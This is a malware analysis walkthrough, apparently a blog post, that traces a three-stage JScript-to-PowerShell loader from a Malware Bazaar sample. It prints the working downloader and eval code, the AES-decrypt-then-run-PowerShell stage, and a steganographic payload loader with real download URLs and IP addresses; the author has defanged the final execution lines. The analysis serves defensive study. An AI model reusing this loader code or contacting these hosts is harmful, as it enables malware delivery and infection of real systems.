https://bazaar.abuse.ch/sample/41f76926477c7f8759900567ced4e5e1f9057e40d2a151badc873d23f372997e/

Stage 1 - comprobante_swift89534657687.js

Directly after downloading the stage 1 payload from malware bazaar you can open it inside your malware analysis VM (flareVM), if you have not prepared one yet, have a look at this video:

You can open the malware archive (.zip) with 7zip and use the password infected to extract the stage1 malware.

When you open the .js file with a text editor or vscode (make sure to set the restrictions to “I dont trust the authors of this folder/file” when it asks you) you will see this:

function preexistente(eudiometria) {
  return String.fromCharCode(eudiometria);
}

var pesadume = "<https://past>" + preexistente(101) + "." + preexistente(101) + "" + preexistente(101) + "/d/ARhCV";

var guabirabeira = tripes(pesadume);
horographia(guabirabeira);

function esfolhar(celadolo) {
  var esfuziada = new ActiveXObject("WScript.Shell");
  esfuziada.Run("perispiritual", celadolo);
  var usufruto = esfuziada.Popup("araribina:", 0, "Prompt", 0);
  return usufruto;
}

function horographia(praina) {
  eval(praina);
}

function tripes(pesadume) {
  var cantata = new ActiveXObject("MSXML2.XMLHTTP");
  cantata.open("GET", pesadume, false);
  cantata.send();
  return cantata.responseText;
}

Short and sweet but dangerous nonetheless. At the top you can see a function definition (preexistente) that takes one parameter called eudiometria which then is translated into a string from a CharCode → that is a numerical representation of letters/numbers etc. typically used in javascript / your browser

AHA!

Ok and next what looks like a url is combined from https://past + three function calls with the number 101 + /d/ARhCV

Great but what is String.fromCharCode(101) ?

Open your browser and find out → go to any page and either right click on the page and use inspect and then on console at the bottom

or directly click on the developer → javascript console option

This will open the javascript developer console and if you paste/type String.fromCharCode(101) into it

→ watch magic 🪄 happen (if your browser tells you that you cannot paste code immediately, just follow the guide and type allow pasting first then press enter and continue to paste the snippet

101 apparently is the letter e so when we combine all those elements together we have a new url to download our 2nd stage payload from:

2nd stage from https[:]//paste.ee/d/ARhCV

Stage 2 - https[:]//paste.ee/d/ARhCV

When you have possibly malicious urls the last thing you want to do is to open those on your normal computer - instead you can use someone else’s computer to do that for you 😇

my favorite is https://browserling.com which lets you copy and paste and open urls that you are not sure of → plug the url into the form and click Test now!

You should be greeted with the following beautiful screen:

if not → this is the script that was available there:

function omphalorrhagia(melam) {
    var sephelo = new ActiveXObject("MSXML2.DOMDocument");
    var magnificar = sephelo.createElement("b64");
    magnificar.dataType = "bin.base64";
    magnificar.text = melam;
    var anete = new ActiveXObject("ADODB.Stream");
    anete.Type = 1; // adTypeBinary
    anete.Open();
    anete.Write(magnificar.nodeTypedValue);
    anete.Position = 0;
    var forrageal = anete.Read();
    anete.Close();
    return forrageal;
}

function patornear(perculso, key) {
    var pacientemente = new ActiveXObject("System.Security.Cryptography.RijndaelManaged");
    pacientemente.Mode = 1; // CipherMode.CBC
    pacientemente.Padding = 3; // PaddingMode.Zeros
    pacientemente.BlockSize = 128;
    pacientemente.KeySize = 256;

    var metrofotografia = new ActiveXObject("System.Text.UTF8Encoding");
    var zunga = new ActiveXObject("System.Security.Cryptography.SHA256Managed");
    var desenfrechar = zunga.ComputeHash_2(metrofotografia.GetBytes_4(key));
    pacientemente.Key = desenfrechar;

    var bracaraugustano = omphalorrhagia(perculso);

    var anete = new ActiveXObject("ADODB.Stream");
    anete.Type = 1; // adTypeBinary
    anete.Open();
    anete.Write(bracaraugustano);
    anete.Position = 0;

    var saltadouro = new ActiveXObject("ADODB.Stream");
    saltadouro.Type = 1; // adTypeBinary
    saltadouro.Open();
    // read first 16 bytes and make that the initialization vector (IV) for the decryption
    saltadouro.Write(anete.Read(16));
    saltadouro.Position = 0;
    pacientemente.IV = saltadouro.Read();

    anete.Position = 16; // Move to after the IV -> skip the IV and only decrypt the data after !
    var encordoadura = anete.Read();
    var trautar = pacientemente.CreateDecryptor();

    var viga = new ActiveXObject("ADODB.Stream");
    viga.Type = 1; // adTypeBinary
    viga.Open();
    viga.Write(encordoadura);
    viga.Position = 0;

    // decrypt
    var roleiro = trautar.TransformFinalBlock((viga.Read()), 0, viga.Size);
    var forrageal = metrofotografia.GetString((roleiro));

    anete.Close();
    saltadouro.Close();
    viga.Close();

    // return decrypted powershell script
    return forrageal;
}

var perculso = "U6QYC302+gYnmiIMvSYl13luCzfghsk1EkWwMHcen71WAx/vxj2b4kzthulb/qIZXPyDDrOxbK47oModVkUVOH21YwWC+x8RiXfTfQ2bE7IhkHyxCre0Q6MZ3FzjjbECenlR1SjzO6ly81brt+kwPIung8Tbtxkrz9OYBRofhtsfRxZKticveCKUAbys+okxzO4eNBEOQkmi6Kj/cr9aLGxbMUaCuPN2VQqUDps3xie2fPGMqz9lkqupoLsym58il3tKxJe/EZqnoMzLUeeEp8n+MTjmHa1Hwtrau91+s1XLZiDXKstLwccfr6nvKuo50f6FXQqgpJTOHwbEsklnfzmqAVYK+GqAQxtvDfK9LceiFVGMKZYzL84LWy02htydZNMSWZkdjETKc5EXg/KdPsDN0yT+vWdzp3Hiz4UtGzopY3G8G2iXjVazuZArPBwXEius9bG1xVkmJbCPHmcIa/KI1+Une/F+yXvWwoheJBDiGMxnvFQ4CYpBs0qpOSB+95s57xb0xFkuEGMcYPytyyyJsDZ5adf1d7sTvn0+ZjpGxMz5VAG54502ORVT+NprlvaXQXyl2rSAa9aoe8o9L+rBf/1KZeFEn854uNZxdguBYzLBG+4dA9/zsYH/3c9wyY88rXkSgMy8HdyobbFN6K6n2ZQaT7BTUVx2cEMrYhEzeHVwudcIKzj3U/V1CcBz66WiYkuuSBnjje8a+XxGhrjnuIm08CtHTDAumP8XT+VRUlqVSlMUuyGbPILcxwt2mj4zKLlPX5ciL4ebA/poNwNYN2webG/ctHxkGGzm+JJByu/Na23dzI8ZlxaomV+s4lzrOuEeBENyiT6tZkEr0nfNS2sXx5spPEqC3hVVkKASkSE0jeWNLms0wWvoMGxBPJUhPLwcgZPROgbQv6kgE20+Pdgt7ezY3pgadfRV/jg4JtTeezA1w2WCvU0cL2RDyTYDhmiIU7sDNEFapSEU16NBDe4zi7+3Ypz6y8Nzzo2sI2l5uhrVdT2g2UzYoDM8c30/dgwZqLJzWHZXax/uDnlmvcBbxvZ1YFSg4m6/I+RUzF46L0EQs+bkVQJmcolKX8tH5AP+jFzarKgA8OhPZexsdnXe0xSBRyuIJwrtNzIBRYzgSF1MqRU7i+IMD2GYc5JvWDNLJ3H/tEpknDIV9XLhq5bKQm35eOHTnFcrAceZWoTFrpToUxiQa94/cOIgb8Yialab0HyoQ6S9wPTVbo42hLnfutxrajHsAIiciipEbDAsGgDwzHv/48pFjv8G1dqrlO0Adp90KtLuN3W44neUZur8pmAmJWsPEogHgu8b1ulKQqEoWMZxkIcwsIFQa+T5+MabIocphFn5rExhwjQm9kTDvPK1xMzubNPijXdVWYBp+Hkf+ViLP8XO3+3DTFwK4o9AvkyFQz6haiR/jRgqDTaBNc+6ny8nrhJhK6RG7UvUn6MCSQy/2mMtR4CVuFg+i7sJbVnokoWpeDhijEOQREVC4FfRmJ/BlKe1FO0xJBAYaVSKc1kASDRfd4EwZx4ld4Z4/7oFsAdeozcFrP1o+FlpUwOx9jNqxdFLk+wc+mELjwO84JbTeNQ/tAnxpBZnepD0irx/ZZLK7EirERyZb7w2N2AONiKvemcUaews9Yi35xSeGdR7458ZgrQ27RxKBJt8dE9bliGsAswEZpPhBsToyC+DTTemG2KgHfC4663PpKwZ5L79Dw2NIGf4";
var lacertinos = "12345678901234567890123456789012";
var durguete = patornear(perculso, lacertinos);

var sorte = new ActiveXObject("WScript.Shell");
sorte.Run("powershell -Command \\"" + durguete + "\\"", 0, false);

This script does a lot of things but we can walk through it from top to bottom and use my MAGIC MALWARE ANALYSIS EXPLAINER FRIEND - ChatGPT to help us.

We start with the first function

function omphalorrhagia(melam) {
    var sephelo = new ActiveXObject("MSXML2.DOMDocument");
    var magnificar = sephelo.createElement("b64");
    magnificar.dataType = "bin.base64";
    magnificar.text = melam;
    var anete = new ActiveXObject("ADODB.Stream");
    anete.Type = 1; // adTypeBinary
    anete.Open();
    anete.Write(magnificar.nodeTypedValue);
    anete.Position = 0;
    var forrageal = anete.Read();
    anete.Close();
    return forrageal;
}

This takes a single input and returns a single output → in between it tries to open a browser / DOMDocument and loads some base64 encoded string into an object and returns that object/binary data 😅✅

How would you find this out if you cannot read the code? EASY - just ask ChatGPT:

what does this function do ```function omphalorrhagia(melam) {
    var sephelo = new ActiveXObject("MSXML2.DOMDocument");
    var magnificar = sephelo.createElement("b64");
    magnificar.dataType = "bin.base64";
    magnificar.text = melam;
    var anete = new ActiveXObject("ADODB.Stream");
    anete.Type = 1; // adTypeBinary
    anete.Open();
    anete.Write(magnificar.nodeTypedValue);
    anete.Position = 0;
    var forrageal = anete.Read();
    anete.Close();
    return forrageal;
}

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1709582176287/9e9548a1-e9e2-4944-b345-60d2746b462a.png align="center")

and our best friend tells us:

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1709582193026/09b3210c-63bd-4bb3-82ab-c3a50e312189.png align="center")

AHA! great, that helps → but what happens next?

The 2nd function `patornear` takes two arguments, `perculso` and `key` and does some cryptography in the beginning (`RijndaelManaged`, often called AES), then sets some values and uses the previous function `var bracaraugustano = omphalorrhagia(perculso);` with the first input

AHA! so perculso is base64 encoded code, and we use it in this 2nd function for something!

What we do next is to open the file and read the `first 16 bytes` into a variable called `pacientemente.IV` - for those of you who don’t know, IV is the initialization vector often used in decryption operations together with a key.

key? EN CE MOMENT! I remember that there was a key in this function as well, so we have the IV and the Key now?

...but where is the text to be decoded?!

We also take that from the base64 encoded string → the first 16 bytes (the IV) are skipped and we read the rest into a variable and then decrypt it with the key and the IV. 🤯

The last step is to return the decrypted code in plain-text.

```javascript

function patornear(perculso, key) {
    var pacientemente = new ActiveXObject("System.Security.Cryptography.RijndaelManaged");
    pacientemente.Mode = 1; // CipherMode.CBC
    pacientemente.Padding = 3; // PaddingMode.Zeros
    pacientemente.BlockSize = 128;
    pacientemente.KeySize = 256;

    var metrofotografia = new ActiveXObject("System.Text.UTF8Encoding");
    var zunga = new ActiveXObject("System.Security.Cryptography.SHA256Managed");
    var desenfrechar = zunga.ComputeHash_2(metrofotografia.GetBytes_4(key));
    pacientemente.Key = desenfrechar;

    var bracaraugustano = omphalorrhagia(perculso);

    var anete = new ActiveXObject("ADODB.Stream");
    anete.Type = 1; // adTypeBinary
    anete.Open();
    anete.Write(bracaraugustano);
    anete.Position = 0;

    var saltadouro = new ActiveXObject("ADODB.Stream");
    saltadouro.Type = 1; // adTypeBinary
    saltadouro.Open();
    // read first 16 bytes and make that the initialization vector (IV) for the decryption
    saltadouro.Write(anete.Read(16));
    saltadouro.Position = 0;
    pacientemente.IV = saltadouro.Read();

    anete.Position = 16; // Move to after the IV -> skip the IV and only decrypt the data after !
    var encordoadura = anete.Read();
    var trautar = pacientemente.CreateDecryptor();

    var viga = new ActiveXObject("ADODB.Stream");
    viga.Type = 1; // adTypeBinary
    viga.Open();
    viga.Write(encordoadura);
    viga.Position = 0;

    // decrypt the "base64 string" using the key and the IV
    var roleiro = trautar.TransformFinalBlock((viga.Read()), 0, viga.Size);
    var forrageal = metrofotografia.GetString((roleiro));

    anete.Close();
    saltadouro.Close();
    viga.Close();

    // return decrypted powershell script
    return forrageal;
}

WAOOOOWWW MAGIC ! 🦄

Again if you don’t understand this part, ask your friend ChatGPT for an explanation

On to the last steps - this is the base64 encoded something (perculso) and the key (lacertinos) which are then fed into the 2nd function and the result from that function call (plaintext) is used to run a powershell command that the plaintext holds ✨🦹

var perculso = "U6QYC302+gYnmiIMvSYl13luCzfghsk1EkWwMHcen71WAx/vxj2b4kzthulb/qIZXPyDDrOxbK47oModVkUVOH21YwWC+x8RiXfTfQ2bE7IhkHyxCre0Q6MZ3FzjjbECenlR1SjzO6ly81brt+kwPIung8Tbtxkrz9OYBRofhtsfRxZKticveCKUAbys+okxzO4eNBEOQkmi6Kj/cr9aLGxbMUaCuPN2VQqUDps3xie2fPGMqz9lkqupoLsym58il3tKxJe/EZqnoMzLUeeEp8n+MTjmHa1Hwtrau91+s1XLZiDXKstLwccfr6nvKuo50f6FXQqgpJTOHwbEsklnfzmqAVYK+GqAQxtvDfK9LceiFVGMKZYzL84LWy02htydZNMSWZkdjETKc5EXg/KdPsDN0yT+vWdzp3Hiz4UtGzopY3G8G2iXjVazuZArPBwXEius9bG1xVkmJbCPHmcIa/KI1+Une/F+yXvWwoheJBDiGMxnvFQ4CYpBs0qpOSB+95s57xb0xFkuEGMcYPytyyyJsDZ5adf1d7sTvn0+ZjpGxMz5VAG54502ORVT+NprlvaXQXyl2rSAa9aoe8o9L+rBf/1KZeFEn854uNZxdguBYzLBG+4dA9/zsYH/3c9wyY88rXkSgMy8HdyobbFN6K6n2ZQaT7BTUVx2cEMrYhEzeHVwudcIKzj3U/V1CcBz66WiYkuuSBnjje8a+XxGhrjnuIm08CtHTDAumP8XT+VRUlqVSlMUuyGbPILcxwt2mj4zKLlPX5ciL4ebA/poNwNYN2webG/ctHxkGGzm+JJByu/Na23dzI8ZlxaomV+s4lzrOuEeBENyiT6tZkEr0nfNS2sXx5spPEqC3hVVkKASkSE0jeWNLms0wWvoMGxBPJUhPLwcgZPROgbQv6kgE20+Pdgt7ezY3pgadfRV/jg4JtTeezA1w2WCvU0cL2RDyTYDhmiIU7sDNEFapSEU16NBDe4zi7+3Ypz6y8Nzzo2sI2l5uhrVdT2g2UzYoDM8c30/dgwZqLJzWHZXax/uDnlmvcBbxvZ1YFSg4m6/I+RUzF46L0EQs+bkVQJmcolKX8tH5AP+jFzarKgA8OhPZexsdnXe0xSBRyuIJwrtNzIBRYzgSF1MqRU7i+IMD2GYc5JvWDNLJ3H/tEpknDIV9XLhq5bKQm35eOHTnFcrAceZWoTFrpToUxiQa94/cOIgb8Yialab0HyoQ6S9wPTVbo42hLnfutxrajHsAIiciipEbDAsGgDwzHv/48pFjv8G1dqrlO0Adp90KtLuN3W44neUZur8pmAmJWsPEogHgu8b1ulKQqEoWMZxkIcwsIFQa+T5+MabIocphFn5rExhwjQm9kTDvPK1xMzubNPijXdVWYBp+Hkf+ViLP8XO3+3DTFwK4o9AvkyFQz6haiR/jRgqDTaBNc+6ny8nrhJhK6RG7UvUn6MCSQy/2mMtR4CVuFg+i7sJbVnokoWpeDhijEOQREVC4FfRmJ/BlKe1FO0xJBAYaVSKc1kASDRfd4EwZx4ld4Z4/7oFsAdeozcFrP1o+FlpUwOx9jNqxdFLk+wc+mELjwO84JbTeNQ/tAnxpBZnepD0irx/ZZLK7EirERyZb7w2N2AONiKvemcUaews9Yi35xSeGdR7458ZgrQ27RxKBJt8dE9bliGsAswEZpPhBsToyC+DTTemG2KgHfC4663PpKwZ5L79Dw2NIGf4";
var lacertinos = "12345678901234567890123456789012";
var durguete = patornear(perculso, lacertinos);

var sorte = new ActiveXObject("WScript.Shell");
sorte.Run("powershell -Command \\"" + durguete + "\\"", 0, false);

Wonderful, now there is only a slight issue… this script needs internet explorer APIs to work and well… that is not something we have or want 😀

How can we now isolate the command in plaintext?!

Two options -

1. use cyberchef and fiddle with the parameters until you find the correct decryption setup

2. use ChatGPT to change this beautiful mess into PowerShell and copy paste to victory ✌️🥇

Why powershell you ask?! because we use part of the .net API and that is easiest to use in combination with powershell / C# (and I hate C#…) 😅

So you go and isolate the important function and make it easier for chatgpt to understand by removing the parameters and plugging them directly into the function and asking it to make this beautiful powershell PLEASE

intput:

function decrypt_base64_enc_blob() {
    var key = "12345678901234567890123456789012";
    var base64_string = "U6QYC302+gYnmiIMvSYl13luCzfghsk1EkWwMHcen71WAx/vxj2b4kzthulb/qIZXPyDDrOxbK47oModVkUVOH21YwWC+x8RiXfTfQ2bE7IhkHyxCre0Q6MZ3FzjjbECenlR1SjzO6ly81brt+kwPIung8Tbtxkrz9OYBRofhtsfRxZKticveCKUAbys+okxzO4eNBEOQkmi6Kj/cr9aLGxbMUaCuPN2VQqUDps3xie2fPGMqz9lkqupoLsym58il3tKxJe/EZqnoMzLUeeEp8n+MTjmHa1Hwtrau91+s1XLZiDXKstLwccfr6nvKuo50f6FXQqgpJTOHwbEsklnfzmqAVYK+GqAQxtvDfK9LceiFVGMKZYzL84LWy02htydZNMSWZkdjETKc5EXg/KdPsDN0yT+vWdzp3Hiz4UtGzopY3G8G2iXjVazuZArPBwXEius9bG1xVkmJbCPHmcIa/KI1+Une/F+yXvWwoheJBDiGMxnvFQ4CYpBs0qpOSB+95s57xb0xFkuEGMcYPytyyyJsDZ5adf1d7sTvn0+ZjpGxMz5VAG54502ORVT+NprlvaXQXyl2rSAa9aoe8o9L+rBf/1KZeFEn854uNZxdguBYzLBG+4dA9/zsYH/3c9wyY88rXkSgMy8HdyobbFN6K6n2ZQaT7BTUVx2cEMrYhEzeHVwudcIKzj3U/V1CcBz66WiYkuuSBnjje8a+XxGhrjnuIm08CtHTDAumP8XT+VRUlqVSlMUuyGbPILcxwt2mj4zKLlPX5ciL4ebA/poNwNYN2webG/ctHxkGGzm+JJByu/Na23dzI8ZlxaomV+s4lzrOuEeBENyiT6tZkEr0nfNS2sXx5spPEqC3hVVkKASkSE0jeWNLms0wWvoMGxBPJUhPLwcgZPROgbQv6kgE20+Pdgt7ezY3pgadfRV/jg4JtTeezA1w2WCvU0cL2RDyTYDhmiIU7sDNEFapSEU16NBDe4zi7+3Ypz6y8Nzzo2sI2l5uhrVdT2g2UzYoDM8c30/dgwZqLJzWHZXax/uDnlmvcBbxvZ1YFSg4m6/I+RUzF46L0EQs+bkVQJmcolKX8tH5AP+jFzarKgA8OhPZexsdnXe0xSBRyuIJwrtNzIBRYzgSF1MqRU7i+IMD2GYc5JvWDNLJ3H/tEpknDIV9XLhq5bKQm35eOHTnFcrAceZWoTFrpToUxiQa94/cOIgb8Yialab0HyoQ6S9wPTVbo42hLnfutxrajHsAIiciipEbDAsGgDwzHv/48pFjv8G1dqrlO0Adp90KtLuN3W44neUZur8pmAmJWsPEogHgu8b1ulKQqEoWMZxkIcwsIFQa+T5+MabIocphFn5rExhwjQm9kTDvPK1xMzubNPijXdVWYBp+Hkf+ViLP8XO3+3DTFwK4o9AvkyFQz6haiR/jRgqDTaBNc+6ny8nrhJhK6RG7UvUn6MCSQy/2mMtR4CVuFg+i7sJbVnokoWpeDhijEOQREVC4FfRmJ/BlKe1FO0xJBAYaVSKc1kASDRfd4EwZx4ld4Z4/7oFsAdeozcFrP1o+FlpUwOx9jNqxdFLk+wc+mELjwO84JbTeNQ/tAnxpBZnepD0irx/ZZLK7EirERyZb7w2N2AONiKvemcUaews9Yi35xSeGdR7458ZgrQ27RxKBJt8dE9bliGsAswEZpPhBsToyC+DTTemG2KgHfC4663PpKwZ5L79Dw2NIGf4";
    var pacientemente = new ActiveXObject("System.Security.Cryptography.RijndaelManaged");
    pacientemente.Mode = 1; // CipherMode.CBC
    pacientemente.Padding = 3; // PaddingMode.Zeros
    pacientemente.BlockSize = 128;
    pacientemente.KeySize = 256;

    var metrofotografia = new ActiveXObject("System.Text.UTF8Encoding");
    var zunga = new ActiveXObject("System.Security.Cryptography.SHA256Managed");
    var desenfrechar = zunga.ComputeHash_2(metrofotografia.GetBytes_4(key));
    pacientemente.Key = desenfrechar;

    var bracaraugustano = omphalorrhagia(base64_string);

    var anete = new ActiveXObject("ADODB.Stream");
    anete.Type = 1; // adTypeBinary
    anete.Open();
    anete.Write(bracaraugustano);
    anete.Position = 0;

    var saltadouro = new ActiveXObject("ADODB.Stream");
    saltadouro.Type = 1; // adTypeBinary
    saltadouro.Open();
    saltadouro.Write(anete.Read(16));
    saltadouro.Position = 0;
    pacientemente.IV = saltadouro.Read();

    anete.Position = 16; // Move to after the IV
    var encordoadura = anete.Read();
    var trautar = pacientemente.CreateDecryptor();

    var viga = new ActiveXObject("ADODB.Stream");
    viga.Type = 1; // adTypeBinary
    viga.Open();
    viga.Write(encordoadura);
    viga.Position = 0;

    var roleiro = trautar.TransformFinalBlock((viga.Read()), 0, viga.Size);
    var powershell_command = metrofotografia.GetString((roleiro));

    anete.Close();
    saltadouro.Close();
    viga.Close();

    return powershell_command;
}

because the script requires activex and dotnet api’s to be available we try to convert it to powershell so that we can easily execute it (make sure to copy and paste the key + base64_string from the original script afterwards, because chatgpt likes to hallucinate long strings and not take the original one’s - dont ask me how I found out 😅)

You can use the following prompt:

what would this function look like in powershell ``` <PASTE_FUNCTION_HERE>

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1709582269909/60cad2f6-1439-4931-ad9c-8546380e2781.png align="center")

You should get back something like the following script:

```powershell
function Decrypt-Base64EncryptedBlob {
    param (
        [string]$base64String
    )

    # Define the key
    $key = "12345678901234567890123456789012"

    # Create RijndaelManaged object
    $rijndael = New-Object System.Security.Cryptography.RijndaelManaged
    $rijndael.Mode = [System.Security.Cryptography.CipherMode]::CBC
    $rijndael.Padding = [System.Security.Cryptography.PaddingMode]::Zeros
    $rijndael.BlockSize = 128
    $rijndael.KeySize = 256

    # Create SHA256Managed object and compute hash
    $sha256 = New-Object System.Security.Cryptography.SHA256Managed
    $keyBytes = $sha256.ComputeHash([System.Text.Encoding]::UTF8.GetBytes($key))
    $rijndael.Key = $keyBytes

    # Decode the base64 string
    $decodedBytes = [System.Convert]::FromBase64String($base64String)

    # Extract IV from the beginning of the decoded bytes
    $iv = $decodedBytes[0..15]
    $rijndael.IV = $iv

    # Decrypt the data
    $decryptor = $rijndael.CreateDecryptor()
    $decryptedBytes = $decryptor.TransformFinalBlock($decodedBytes, 16, $decodedBytes.Length - 16)

    # Convert decrypted bytes to string
    $decryptedString = [System.Text.Encoding]::UTF8.GetString($decryptedBytes)

    return $decryptedString
}
$encryptedBase64String = "U6QYC302+gYnmiIMvSYl13luCzfghsk1EkWwMHcen71WAx/vxj2b4kzthulb/qIZXPyDDrOxbK47oModVkUVOH21YwWC+x8RiXfTfQ2bE7IhkHyxCre0Q6MZ3FzjjbECenlR1SjzO6ly81brt+kwPIung8Tbtxkrz9OYBRofhtsfRxZKticveCKUAbys+okxzO4eNBEOQkmi6Kj/cr9aLGxbMUaCuPN2VQqUDps3xie2fPGMqz9lkqupoLsym58il3tKxJe/EZqnoMzLUeeEp8n+MTjmHa1Hwtrau91+s1XLZiDXKstLwccfr6nvKuo50f6FXQqgpJTOHwbEsklnfzmqAVYK+GqAQxtvDfK9LceiFVGMKZYzL84LWy02htydZNMSWZkdjETKc5EXg/KdPsDN0yT+vWdzp3Hiz4UtGzopY3G8G2iXjVazuZArPBwXEius9bG1xVkmJbCPHmcIa/KI1+Une/F+yXvWwoheJBDiGMxnvFQ4CYpBs0qpOSB+95s57xb0xFkuEGMcYPytyyyJsDZ5adf1d7sTvn0+ZjpGxMz5VAG54502ORVT+NprlvaXQXyl2rSAa9aoe8o9L+rBf/1KZeFEn854uNZxdguBYzLBG+4dA9/zsYH/3c9wyY88rXkSgMy8HdyobbFN6K6n2ZQaT7BTUVx2cEMrYhEzeHVwudcIKzj3U/V1CcBz66WiYkuuSBnjje8a+XxGhrjnuIm08CtHTDAumP8XT+VRUlqVSlMUuyGbPILcxwt2mj4zKLlPX5ciL4ebA/poNwNYN2webG/ctHxkGGzm+JJByu/Na23dzI8ZlxaomV+s4lzrOuEeBENyiT6tZkEr0nfNS2sXx5spPEqC3hVVkKASkSE0jeWNLms0wWvoMGxBPJUhPLwcgZPROgbQv6kgE20+Pdgt7ezY3pgadfRV/jg4JtTeezA1w2WCvU0cL2RDyTYDhmiIU7sDNEFapSEU16NBDe4zi7+3Ypz6y8Nzzo2sI2l5uhrVdT2g2UzYoDM8c30/dgwZqLJzWHZXax/uDnlmvcBbxvZ1YFSg4m6/I+RUzF46L0EQs+bkVQJmcolKX8tH5AP+jFzarKgA8OhPZexsdnXe0xSBRyuIJwrtNzIBRYzgSF1MqRU7i+IMD2GYc5JvWDNLJ3H/tEpknDIV9XLhq5bKQm35eOHTnFcrAceZWoTFrpToUxiQa94/cOIgb8Yialab0HyoQ6S9wPTVbo42hLnfutxrajHsAIiciipEbDAsGgDwzHv/48pFjv8G1dqrlO0Adp90KtLuN3W44neUZur8pmAmJWsPEogHgu8b1ulKQqEoWMZxkIcwsIFQa+T5+MabIocphFn5rExhwjQm9kTDvPK1xMzubNPijXdVWYBp+Hkf+ViLP8XO3+3DTFwK4o9AvkyFQz6haiR/jRgqDTaBNc+6ny8nrhJhK6RG7UvUn6MCSQy/2mMtR4CVuFg+i7sJbVnokoWpeDhijEOQREVC4FfRmJ/BlKe1FO0xJBAYaVSKc1kASDRfd4EwZx4ld4Z4/7oFsAdeozcFrP1o+FlpUwOx9jNqxdFLk+wc+mELjwO84JbTeNQ/tAnxpBZnepD0irx/ZZLK7EirERyZb7w2N2AONiKvemcUaews9Yi35xSeGdR7458ZgrQ27RxKBJt8dE9bliGsAswEZpPhBsToyC+DTTemG2KgHfC4663PpKwZ5L79Dw2NIGf4";
Decrypt-Base64EncryptedBlob -base64String $encryptedBase64String

paste that into a new Powershell script (it’s convenient to use powershell ISE) and press the green play button in the navigation bar ⬇️

The output will be shown in the blue window below ⬆️

If you prettify this script into a more human readable format you will get this 3rd stage payload (I took the liberty to defang it by commenting the last three lines):

function DownloadDataFromLinks { param ([string[]]$links) 
    $webClient = New-Object System.Net.WebClient; 
    $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; 
    foreach ($link in $shuffledLinks) { 
        try { 
            return $webClient.DownloadData($link) 
            } catch { continue } 
        }; 

        return $null 
    }; 
    $links = @('<https://uploaddeimagens.com.br/images/004/731/991/original/new_image.jpg?1707144482>', '<http://45.74.19.84/xampp/bkp/js_bkp.jpg>');
    $imageBytes = DownloadDataFromLinks $links; 
    if ($imageBytes -ne $null) { 
    $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); 
    $startFlag = '<<BASE64_START>>';
    $endFlag = '<<BASE64_END>>'; 
    $startIndex = $imageText.IndexOf($startFlag); 
    $endIndex = $imageText.IndexOf($endFlag); 

    if ($startIndex -ge 0 -and $endIndex -gt $startIndex) {

       $startIndex += $startFlag.Length; 
       $base64Length = $endIndex - $startIndex; 
       $base64Command = $imageText.Substring($startIndex, $base64Length); 
       $commandBytes = [System.Convert]::FromBase64String($base64Command); 
       $commandBytes;

       # defang the script by commenting the dangerous lines
       #$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); 
       #$type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); 
       #$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.diord46esab/19.412.542.271//:ptth' , 'desativado' , 'C:\\ProgramData\\' , 'Name'))
       }
}

What does that do though?! 🤔💭

from top to bottom

→ it defines a function that download an image from one random url out of all the urls that have been provided (sometimes called loader)

→ it then defines 2 download links https[:]//uploaddeimagens.com.br/images/004/731/991/original/new_image.jpg?1707144482

http[:]//45.74.19.84/xampp/bkp/js_bkp.jpg

→ the script only continues if the download was successful and then looks for <<BASE64_START>> and <<BASE64_END>> in the source code of the downloaded images → STEGO or Steganography , that means hiding malware / code in images

Ok so we need internet access to check the images → go to browserling and see if one of the urls is still up → we get lucky, the first one works 🎉

Ok now swap into a linux throw-away VM and use wget to download the image from the server

wget https://uploaddeimagens.com.br/images/004/731/991/original/new_image.jpg?1707144482 -O image.jpg

and then we check if we can see BASE64_START in the image source with grep

grep -aHr "BASE64_START" image.jpg

This was a terrible mistake 😅 and our terminal get’s overflown with text 😵‍💫😬

BUT at least we know that the code is in the image → so now we want to extract it

we can either transfer the image.jpg with a temporary python webserver / sftp or another method of your choice

→ this file needs to get into your flareVM Windows machine

You can also download it from here:

Then you modify the stage3 PowerShell script to only isolate the base64 code:

    # read image as bytes from the location it is in -> adjust this to your setup
    $imageBytes = [System.IO.File]::ReadAllBytes("C:\\Users\\Administrator\\Downloads\\image.jpg"); 

    if ($imageBytes -ne $null) { 
        $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); 
        $startFlag = '<<BASE64_START>>';
        $endFlag = '<<BASE64_END>>'; 
        $startIndex = $imageText.IndexOf($startFlag); 
        $endIndex = $imageText.IndexOf($endFlag); 

        if ($startIndex -ge 0 -and $endIndex -gt $startIndex) {

           $startIndex += $startFlag.Length; 
           $base64Length = $endIndex - $startIndex; 
           $base64Command = $imageText.Substring($startIndex, $base64Length); 
                        # write the base64 command to a file called base64stage3.txt in the downloads folder
           $base64Command | out-file -filepath C:\\Users\\Administrator\\downloads\\base64stage3.txt;
        }
}

Then proceed to download the base64stage3.txt and plug it into cyberchef

https://gchq.github.io/CyberChef

in the top right, click Open file as input ⬇️

Then select the correct file:

and setup the following recipe:

decode text → UTF-16LE → from base64

You can see on the right side that there is a specific readable line that should scare you 😬

This program cannot be run in DOS mode.

That means this is a binary, a PE file to be exact (portable executable).

What do we do with it? 🤔

First, download the file from cyberchef ⬇️

Throw it back into flareVM and see if you can decipher some of it’s content

As we know that this is a PE file we want to use the PE tools available with flarevm to have a look inside, e.g. use CFF Explorer from the Tools → PE directory and load the exe file ⬇️

Here you can see some interesting information on the right side → 1. thisi s a portable executable for 32 bit architecture (x86) AND this is a .NET assembly

The last part should get you excited because that means we can easily decompile it with 2 clicks 🥳

At the bottom you can also see a visual basic file that might be interesting in the future Projetoautomacao.vb which btw. appears to be Portuguese / Brazilian

Wonderful, if you want to decompile the binary and look at the source code either dnSpy.exe or ILSpy.exe are your favorite friends (its the same tool basically)

Open it → click on File → Open → select the correct malware.exe file and wait a couple of seconds for the decompilation to finish

Once that is done you should see a new entry in the Assemblies list on the left, called download

We wont go into more details today but feel free to look around 🙂

Back to our stage3 payload → We have one more interesting url that we have not looked at yet:

txt.diord46esab/19.412.542.271//:ptth

This might look a little interesting but lucky for us you are a great backwards-reader 🧑‍🏫

For those of you who are not → http[:]//172.245.214.91/base64droid.txt

